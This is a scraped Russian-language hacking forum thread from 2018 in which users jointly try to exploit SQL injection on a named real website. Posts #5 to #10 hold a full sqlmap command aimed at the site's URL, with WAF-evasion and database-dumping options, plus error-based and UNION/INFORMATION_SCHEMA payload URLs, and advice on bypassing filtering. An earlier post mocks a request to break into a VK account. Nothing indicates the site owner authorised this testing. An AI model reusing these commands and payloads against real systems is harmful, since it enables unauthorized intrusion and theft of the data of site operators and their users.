HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.04.2018, 18:45
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

Цитата:
Сообщение от 17919  

как аккаунт вк открыть?
судя по постам в разных темах, то для тебя только один вариант, написать на бумажке аккаунт и встав на колени перед ним молить великого Бога контакта и всея соцсети что бы он открылся
 
Ответить с цитированием

  #2  
Старый 07.04.2018, 21:10
17919
Новичок
Регистрация: 26.01.2016
Сообщений: 14
Провел на форуме:
4086

Репутация: 0
По умолчанию

Цитата:
Сообщение от Gorev  

судя по постам в разных темах, то для тебя только один вариант, написать на бумажке аккаунт и встав на колени перед ним молить великого Бога контакта и всея соцсети что бы он открылся
с чего такой детский вывод?
 
Ответить с цитированием

  #3  
Старый 08.04.2018, 00:53
Jerri
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
Провел на форуме:
2510517

Репутация: 334
По умолчанию

Цитата:
Сообщение от 17919  

с чего такой детский вывод?
Цитата:
 
Ответить с цитированием

  #4  
Старый 08.04.2018, 21:27
erwerr2321
Флудер
Регистрация: 19.06.2015
Сообщений: 4,126
Провел на форуме:
759330

Репутация: 147


По умолчанию

хз, на счёт sqli, и не помню чтоб такое дисклоузили, а вот xxe там пофиксили 2 месяца назад...

опять же это то, что из открытого
 
Ответить с цитированием

  #5  
Старый 10.04.2018, 03:29
RWD
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
Провел на форуме:
56255

Репутация: 2
По умолчанию

Цитата:
Сообщение от Vip77  
похоже на WAF

попробуй --current-user

бывает такое что базу не достает, но пользователя бд читает.

еще вариант искать другу скулю на сайте, возможно где будет UNION или error based.
 
Ответить с цитированием

  #6  
Старый 17.04.2018, 00:03
Muracha
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
Провел на форуме:
54593

Репутация: 0
По умолчанию

нмап не может раскрутить скулу

.SpoilerTarget" type="button">Spoiler: 2
sqlmap -u http://wellaprof.elle.ru/competition...=date&offset=9 --dbs --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --current-user
Остальные скрипты тоже.

Ручками так выходит ошибка:

Incorrect usage of UNION and ORDER BY

Проблема в фильтрации или на самом деле скули там нет?
 
Ответить с цитированием

  #7  
Старый 17.04.2018, 00:41
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от Muracha  

нмап не может раскрутить скулу
Spoiler: 2
sqlmap -u
http://wellaprof.elle.ru/competition...=date&offset=9
--dbs --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --current-user
Остальные скрипты тоже.
Ручками так выходит ошибка:
Incorrect usage of UNION and ORDER BY
Проблема в фильтрации или на самом деле скули там нет?
Скуля там есть это 100%

по ошибке всё ясно там может waf стоит ща сам гляну
 
Ответить с цитированием

  #8  
Старый 17.04.2018, 00:44
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от Muracha  

нмап не может раскрутить скулу
Spoiler: 2
sqlmap -u
http://wellaprof.elle.ru/competition...=date&offset=9
--dbs --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --current-user
Остальные скрипты тоже.
Ручками так выходит ошибка:
Incorrect usage of UNION and ORDER BY
Проблема в фильтрации или на самом деле скули там нет?
http://wellaprof.elle.ru/competitio...R(101),CHAR(109),CHAR(109),CHAR(97))) ),1)-- 1
 
Ответить с цитированием

  #9  
Старый 17.04.2018, 01:17
Muracha
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
Провел на форуме:
54593

Репутация: 0
По умолчанию

 
Ответить с цитированием

  #10  
Старый 17.04.2018, 01:56
Muracha
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
Провел на форуме:
54593

Репутация: 0
По умолчанию

И почему не работает запрос, он же верный по своей структуре?

.SpoilerTarget" type="button">Spoiler: 1
http://wellaprof.elle.ru/competitio...(),concat(0x3a,CONCAT(AES_DECRYPT(AES _ENCRYPT(TABLE_NAME,0x71),0x71))))%2c1)+FROM+INFORMATION_SCHEMA.TABLES%20--%202
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.